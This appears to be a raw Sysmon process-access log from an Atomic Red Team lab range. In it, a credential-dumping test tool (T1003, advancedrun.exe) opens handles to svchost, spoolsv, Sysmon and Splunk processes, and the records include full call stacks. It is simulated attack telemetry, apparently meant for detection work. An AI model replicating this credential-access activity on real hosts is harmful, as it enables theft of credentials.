\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952107Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\b